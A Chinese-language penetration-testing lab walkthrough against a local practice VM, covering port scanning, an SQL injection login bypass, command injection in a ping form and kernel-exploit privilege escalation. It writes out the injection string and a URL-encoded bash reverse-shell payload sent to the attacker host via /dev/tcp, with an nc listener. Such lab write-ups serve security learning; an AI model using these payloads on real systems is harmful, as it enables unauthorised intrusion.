确定攻击靶机
- 老样子先确定攻击靶机,多了个数据库服务
- 攻击机:192.168.38.128
- 靶机:192.168.38.131
![Pasted-image-20241222143414]()
信息搜集
web服务80/443
页面信息
- 为一个登录页面,尝试使用SQL注入
1'or'1'='1就进去了存在Sql注入。不过页面目前没发现什么东西。
![Pasted-image-20241222143926]()
- 目录扫描到一个路径访问似乎是一个文档
![Pasted-image-20241222145131]()
- 文档路径,不同语言内容类似,就是语言不一样
![Pasted-image-20241222145225]()
- 获取网站指纹信息
![Pasted-image-20241222151042]()
- nmap获取服务版本信息获取。
![Pasted-image-20241222151555]()
数据库服务|3306
- 尝试连接提示没有开启连接,几乎无解
![Pasted-image-20241223143150]()
远程连接服务|22
- 连接测试,提示无密钥交换方式需要后续去添加。
![Pasted-image-20241223143630]()
IPP(CUPS)|631
- 可以通过web页面打开,不过没有任何东西就知道一个版本号码。属于网络打印服务
![Pasted-image-20241223150030]()
整理信息
- 操作系统:Red Hat Linux
- 内核版本:Linux 2.4.9
| 端口 | 服务 | 版本信息 | 备注 |
|---|---|---|---|
| 22/tcp | ssh | OpenSSH 3.9p1 (protocol 1.99) | 交换方式需要添加 |
| 80/tcp | http | Apache httpd 2.0.52 (CentOS) PHP4.3.9 | 存在SQL注入 |
| 111/tcp | rpcbind | 2 (RPC #100000) | |
| 443/tcp | ssl/http | Apache httpd 2.0.52 (CentOS) PHP4.3.9 | 存在SQL注入 |
| 631/tcp | ipp | CUPS 1.1 | 打印服务 |
| 3306/tcp | mysql | MySQL (unauthorized) | 无法远程连接 |
搜索攻击点
历史漏洞POC
SSH | 3.9p1
- 有一个命令执行但是缺少相关服务,只有用户枚举服务。
![Pasted-image-20241223152459]()
Web| 80,443
- 只有一个GET拒绝服务符合
![Pasted-image-20241223154528]()
CUPS|631
- 除开第一个文件上传的,还有几个拒绝服务和本地提权可以使用
![Pasted-image-20241223155240]()
测试攻击
Web服务
- 前段有个SQL注入回去看看
吃了不细看的亏,没注意到他源代码错误的
![Pasted-image-20241223160108]()
- 根据他表单提交的路径为
pingit.php,传参为POST传参,传参点为submit表单按钮(必须),ip- 为什么必须要
submit看HTML的类型为提交按钮,在前段需要按了提交按钮表单的内容才能被提交上去,所有是要必须带上的!!!,enctype为提交类型选择表单提交。
![Pasted-image-20241223160108]()
- 为什么必须要
- 可以
ping那么就可能会存在REC远程代码执行
![Pasted-image-20241223163255]()
- 大概确定了目标机器上没有
nc命令,只能通过bash将shell弹到攻击机上面
#传参,&要经过Url编码变成%26,多个参数之间用的不要进行编码,如果不行就修复表单提交
ip=127.0.0.1%26/bin/bash -i >%26 /dev/tcp/192.168.38.128/8888 0>&1&submit=submit
#监听本地端口
nc -lvvp 8888

bash反弹到攻击机上面,先监听再EXECUTE
![Pasted-image-20241223190413]()
正常显示表单方法
- 刷新登录后的页面,使用Burp Suite抓取请求包,右键拦截响应包后
forward
![Pasted-image-20241223160755]()
- 将响应包的那个多的点删掉后关掉拦截就可以了
![Pasted-image-20241223160957]()
提权
- 可以看到当前的用户为
apache用户,需要对当前用户权限进行提升,想了想之前看到的CUPS的提权漏洞可以试试
![Pasted-image-20241223191012]()
- 不支持,缺少相关的环境架构(x86)不符合。
![Pasted-image-20241223193344]()
信息搜集
- 查看系统的版本和内核确定有没有相关的漏洞
![Pasted-image-20241223193756]()
- 查找相关版本漏洞
![Pasted-image-20241223194013]()
- 查看版本和内核都符合要求
![Pasted-image-20241223194443]()
- 传到靶机上面
![Pasted-image-20241223195148]()
- 编译执行
![Pasted-image-20241223195340]()
























浙公网安备 33010602011771号